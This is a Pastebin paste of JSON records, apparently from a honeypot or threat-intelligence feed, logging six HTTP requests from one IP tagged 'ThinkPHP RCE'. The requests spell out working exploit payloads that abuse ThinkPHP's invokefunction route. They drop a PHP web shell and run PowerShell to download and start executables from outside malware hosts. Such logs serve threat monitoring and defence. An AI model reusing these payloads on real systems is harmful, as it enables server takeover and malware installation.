Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "count": 6,
- "next": null,
- "previous": null,
- "results": [
- {
- "source_ip_address": "183.203.210.115",
- "country": "CN",
- "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
- "payload": "GET /public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/xppybboduonnylo7822.exe');start %SystemRoot%/Temp/xppybboduonnylo7822.exe HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "Platform",
- "description": "ThinkPHP RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-09-30T17:33:30Z",
- "last_seen": "2019-09-30T17:33:30Z"
- },
- {
- "source_ip_address": "183.203.210.115",
- "country": "CN",
- "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
- "payload": "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "Platform",
- "description": "ThinkPHP RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-09-30T17:33:30Z",
- "last_seen": "2019-09-30T17:33:30Z"
- },
- {
- "source_ip_address": "183.203.210.115",
- "country": "CN",
- "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
- "payload": "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/xppybboduonnylo7822.exe');start %SystemRoot%/Temp/xppybboduonnylo7822.exe HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "Platform",
- "description": "ThinkPHP RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-09-30T17:33:30Z",
- "last_seen": "2019-09-30T17:33:30Z"
- },
- {
- "source_ip_address": "183.203.210.115",
- "country": "CN",
- "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
- "payload": "GET /public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://cb.fuckingmy.life/download.exe','%SystemRoot%/Temp/unyugzfinqaposy6545.exe');start %SystemRoot%/Temp/unyugzfinqaposy6545.exe HTTP/1.1",
- "post_data": "",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "Platform",
- "description": "ThinkPHP RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-09-06T13:59:34Z",
- "last_seen": "2019-09-06T14:00:45Z"
- },
- {
- "source_ip_address": "183.203.210.115",
- "country": "CN",
- "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
- "payload": "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1",
- "post_data": "",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "Platform",
- "description": "ThinkPHP RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-09-06T13:59:34Z",
- "last_seen": "2019-09-06T14:00:45Z"
- },
- {
- "source_ip_address": "183.203.210.115",
- "country": "CN",
- "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
- "payload": "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://cb.fuckingmy.life/download.exe','%SystemRoot%/Temp/unyugzfinqaposy6545.exe');start %SystemRoot%/Temp/unyugzfinqaposy6545.exe HTTP/1.1",
- "post_data": "",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "Platform",
- "description": "ThinkPHP RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-09-06T13:59:34Z",
- "last_seen": "2019-09-06T14:00:45Z"
- }
- ]
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement